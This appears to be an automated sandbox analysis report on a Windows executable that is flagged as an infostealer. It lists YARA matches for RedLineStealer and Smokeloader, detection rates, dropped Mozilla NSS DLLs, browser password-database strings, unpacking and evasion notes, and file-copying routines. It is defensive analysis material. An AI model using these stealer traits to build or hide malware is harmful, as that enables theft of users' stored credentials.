Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E7A790 0_2_61E7A790
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E18736 0_2_61E18736
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E86668 0_2_61E86668
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E58670 0_2_61E58670
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E10856 0_2_61E10856
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61EA0BA9 0_2_61EA0BA9
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E62CA3 0_2_61E62CA3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E98FE2 0_2_61E98FE2
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E88FCA 0_2_61E88FCA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E52F80 0_2_61E52F80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61EA2F47 0_2_61EA2F47
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E56F18 0_2_61E56F18
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E4CEF9 0_2_61E4CEF9
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E1EEFF 0_2_61E1EEFF
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E64E0C 0_2_61E64E0C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61EA91F6 0_2_61EA91F6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E9316A 0_2_61E9316A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E9F0ED 0_2_61E9F0ED
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E9D0C3 0_2_61E9D0C3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E8D0B6 0_2_61E8D0B6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E6904E 0_2_61E6904E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E4304E 0_2_61E4304E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E15337 0_2_61E15337
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E19208 0_2_61E19208
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E534E3 0_2_61E534E3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E77452 0_2_61E77452
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E37930 0_2_61E37930
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E7B85E 0_2_61E7B85E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E21816 0_2_61E21816
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E9FBF0 0_2_61E9FBF0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E55BD7 0_2_61E55BD7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E91DC1 0_2_61E91DC1
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E6DDA5 0_2_61E6DDA5
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E31DAB 0_2_61E31DAB
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E95D7A 0_2_61E95D7A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E5BC4C 0_2_61E5BC4C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E1DEC2 0_2_61E1DEC2
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E69E8F 0_2_61E69E8F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E89E0E 0_2_61E89E0E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: String function: 004043B0 appears 315 times
Source: nss3[1].dll.0.dr Static PE information: No import functions for PE file found
Source: vcruntime140[1].dll.0.dr Static PE information: No import functions for PE file found
Source: nss3.dll.0.dr Static PE information: No import functions for PE file found
Source: vcruntime140.dll.0.dr Static PE information: No import functions for PE file found
Source: nss3[1].dll.0.dr Static PE information: Data appended to the last section found
Source: vcruntime140[1].dll.0.dr Static PE information: Data appended to the last section found
Source: nss3.dll.0.dr Static PE information: Data appended to the last section found
Source: vcruntime140.dll.0.dr Static PE information: Data appended to the last section found
Source: FFAk2gixx5.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/18@1/1
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00414DD0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_00414DD0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: FFAk2gixx5.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: FFAk2gixx5.exe, 00000000.00000003.2673898862.00000000231D4000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000003.2685397085.00000000231C8000.00000004.00000020.00020000.00000000.sdmp, JECBGCFHCFIDHIDHDGDG.0.dr, CGDGHCBGDHJJKECAECBA.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: FFAk2gixx5.exe ReversingLabs: Detection: 71%
Source: FFAk2gixx5.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\FFAk2gixx5.exe Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416230
Source: nss3[1].dll.0.dr Static PE information: real checksum: 0x202d6c should be: 0x1c592b
Source: vcruntime140[1].dll.0.dr Static PE information: real checksum: 0x16dd4 should be: 0x14d5a
Source: nss3.dll.0.dr Static PE information: real checksum: 0x202d6c should be: 0x1c592b
Source: vcruntime140.dll.0.dr Static PE information: real checksum: 0x16dd4 should be: 0x14d5a
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004176B5 push ecx; ret 0_2_004176C8
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C373CF push eax; ret 0_2_02C373D6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C373D7 push ecx; ret 0_2_02C373E6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C373A7 push ecx; ret 0_2_02C373BE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C37377 push eax; ret 0_2_02C37386
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C3711F push eax; ret 0_2_02C37115
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C374EF push ecx; ret 0_2_02C374F6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C374F7 push ecx; ret 0_2_02C37506
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C37497 push eax; ret 0_2_02C374AE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C374BF push eax; ret 0_2_02C374EE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C3745F push eax; ret 0_2_02C37466
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C37507 push edx; ret 0_2_02C3751E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C3751F push ecx; ret 0_2_02C37526
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C37527 push ecx; ret 0_2_02C37536
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02C3753F push edx; ret 0_2_02C3754E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD791C push ecx; ret 0_2_02FD792F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\FFAk2gixx5.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_02FD27D7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_02FCD7A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_02FD18B7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_02FCB877
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_02FD2457
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_02FC1827
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_02FCD427
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_02FD1DE7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_02FCDDC7
